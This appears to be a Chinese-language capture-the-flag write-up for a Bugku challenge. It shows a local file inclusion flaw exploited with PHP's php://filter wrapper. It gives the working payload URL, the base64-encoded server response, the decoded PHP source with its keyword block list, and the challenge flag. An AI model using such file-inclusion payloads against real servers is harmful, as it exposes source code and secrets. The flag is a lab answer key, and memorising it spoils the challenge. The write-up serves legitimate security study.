題目:http://123.206.87.240:8005/post/
我們來看這一題
首先打開題目
他讓點擊就點擊唄
跳轉到另一個新的界面
這就沒了???
。。。
沒思路就對了 //假裝證明自己還有進步的空間😆
去偷瞟一下別人的WP
稍微有點思路了
這道題是 本地文件包含漏洞+php偽協議 的結合應用
file關鍵字是提示,說明這題有文件包含漏洞
php的封裝協議:http://php.net/manual/zh/wrappers.php.php
http://123.206.87.240:8005/post/index.php?file=php://filter/read=convert.base64-encode/resource=index.php
首先這是一個file關鍵字的get參數傳遞
php:// 是一種協議名稱
php://filter/ 是一種訪問本地文件的協議
/read=convert.base64-encode/ 表示讀取的方式是base64編碼后
resource=index.php 表示目標文件為index.php
訪問結果:
PGh0bWw+DQogICAgPHRpdGxlPkJ1Z2t1LWN0ZjwvdGl0bGU+DQogICAgDQo8P3BocA0KCWVycm9yX3JlcG9ydGluZygwKTsNCglpZighJF9HRVRbZmlsZV0pe2VjaG8gJzxhIGhyZWY9Ii4vaW5kZXgucGhwP2ZpbGU9c2hvdy5waHAiPmNsaWNrIG1lPyBubzwvYT4nO30NCgkkZmlsZT0kX0dFVFsnZmlsZSddOw0KCWlmKHN0cnN0cigkZmlsZSwiLi4vIil8fHN0cmlzdHIoJGZpbGUsICJ0cCIpfHxzdHJpc3RyKCRmaWxlLCJpbnB1dCIpfHxzdHJpc3RyKCRmaWxlLCJkYXRhIikpew0KCQllY2hvICJPaCBubyEiOw0KCQlleGl0KCk7DQoJfQ0KCWluY2x1ZGUoJGZpbGUpOyANCi8vZmxhZzpmbGFne2VkdWxjbmlfZWxpZl9sYWNvbF9zaV9zaWh0fQ0KPz4NCjwvaHRtbD4NCg==
一大串亂碼??
試試base64解碼
通過base64位解碼得到 FLAG
1 <html> 2 <title>Bugku-ctf</title> 3 <?php 4 error_reporting(0); 5 if(!$_GET[file]){echo '<a href="./index.php?file=show.php">click me? no</a>';} 6 單機跳轉到 ./../show.php 7 $file=$_GET['file']; 8 if(strstr($file,"../")||stristr($file, "tp")||
stristr($file,"input")||stristr($file,"data")){ 9 當get傳參中出現 ../ tp input data 這些關鍵詞的時 10 echo "Oh no!"; 11 輸出 ·· 12 exit(); 13 結束 14 } 15 include($file); 16 //flag:flag{edulcni_elif_lacol_si_siht} //flag 17 ?> 18 </html>
參考: